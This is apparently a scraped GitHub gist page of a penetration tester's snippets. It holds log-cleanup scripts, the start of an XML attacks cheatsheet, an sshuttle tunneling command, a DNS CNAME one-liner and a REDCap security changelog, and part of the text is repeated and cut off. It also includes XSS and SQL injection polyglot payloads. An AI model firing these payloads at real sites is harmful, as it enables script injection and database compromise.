JP jordanpotti

## delete-after.yml
actions:
  1:
    action: delete_indices
    description: >-
      Delete indices older than X days (based on index name), for winlogbeat-
      prefixed indices. Ignore the error if the filter does not result in an
      actionable list of indices (ignore_empty_list) and exit cleanly.
    options:
      ignore_empty_list: True
      disable_action: False

## cleanup.sh
#!/bin/bash
#This bash script will delete the oldest logs and move to more recent logs until it reaches the desired free space on disk.
#Running curator in this fashion is only recomended for single node clusters or standalone setup's such as the HELK.
# This df command grabs the free space of the root '/', if you store your logs elsewhere you will have to modify this.
disk=$(df -H | grep -vE '^Mounted| /.' | awk '{ print $1 " " $5 " " $6 }' | awk 'NR == 2' | awk '{print $2}' |sed 's/%//')
#If you have more than 90 days of logs, this number will have to be increased, went with 90 days with the idea that you will reach
#your disk space limit before 90 days.
days=90
# Disk threshold at 80 percent and also will not delete logs within the last 2 days.
while [ "$disk" > 80 ] && [ "$days" != 2 ]

## xml-attacks.md

      
              1 file
            
          
              2 forks
            
          
              0 comments
            
          
              15 stars
            
          
                jordanpotti
                / xml-attacks.md
            
            
              Created
              December 7, 2017 13:11
                — forked from mgeeky/xml-attacks.md
            
              
                XML Vulnerabilities and Attacks cheatsheet
              
          
    XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.


## sshuttle.sh
#It's not directly mentioned in the documentation on how to do this, so here you go. This command will tunnel everything including DNS:
sshuttle --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem'

## XSS-SQLi-Polygots
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample

## cname one-liners
while read i; do dig CNAME "$i" @8.8.8.8; done < ./<HOST LIST> > cname_domainname
cat cname_domainname|grep "IN CNAME"

## REDCap_Change_log
ChangeLog: Standard Release

Version 7.5.1 - (released 7/12/2017)
BUG FIXES & OTHER CHANGES:

Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating the query string of an HTTP request or REDCap link.
Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating text strings input into conversation titles or messages in REDCap Messenger.
Major bug fix: On certain occasions, the cron job that schedules Automated Survey Invitations containing conditional logic using datediff() with "today" as a parameter might mistakenly remove survey invitations that have been scheduled for another project. This would result in random survey participants not receiving their invitations. This issue occurs very seldom.
Minor security fix: A couple functions (e.g., deleting files in the File Repository or on File Upload fields) were mistakenly not being protected from Cross-site Request Forger
	#!/bin/bash
	#This bash script will delete the oldest logs and move to more recent logs until it reaches the desired free space on disk.
	#Running curator in this fashion is only recomended for single node clusters or standalone setup's such as the HELK.
	# This df command grabs the free space of the root '/', if you store your logs elsewhere you will have to modify this.
	disk=$(df -H \| grep -vE '^Mounted\| /.' \| awk '{ print $1 " " $5 " " $6 }' \| awk 'NR == 2' \| awk '{print $2}' \|sed 's/%//')
	#If you have more than 90 days of logs, this number will have to be increased, went with 90 days with the idea that you will reach
	#your disk space limit before 90 days.
	days=90
	# Disk threshold at 80 percent and also will not delete logs within the last 2 days.
	while [ "$disk" > 80 ] && [ "$days" != 2 ]
	#It's not directly mentioned in the documentation on how to do this, so here you go. This command will tunnel everything including DNS:
	sshuttle --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem'
	';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

	">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></\|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

	" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

	SLEEP(1) /‘ or SLEEP(1) or ‘“ or SLEEP(1) or “/
	SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'\|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"/ FROM some_table WHERE ex = ample
	while read i; do dig CNAME "$i" @8.8.8.8; done < ./<HOST LIST> > cname_domainname
	cat cname_domainname\|grep "IN CNAME"
	ChangeLog: Standard Release

	Version 7.5.1 - (released 7/12/2017)
	BUG FIXES & OTHER CHANGES:

	Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating the query string of an HTTP request or REDCap link.
	Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating text strings input into conversation titles or messages in REDCap Messenger.
	Major bug fix: On certain occasions, the cron job that schedules Automated Survey Invitations containing conditional logic using datediff() with "today" as a parameter might mistakenly remove survey invitations that have been scheduled for another project. This would result in random survey participants not receiving their invitations. This issue occurs very seldom.
	Minor security fix: A couple functions (e.g., deleting files in the File Repository or on File Upload fields) were mistakenly not being protected from Cross-site Request Forger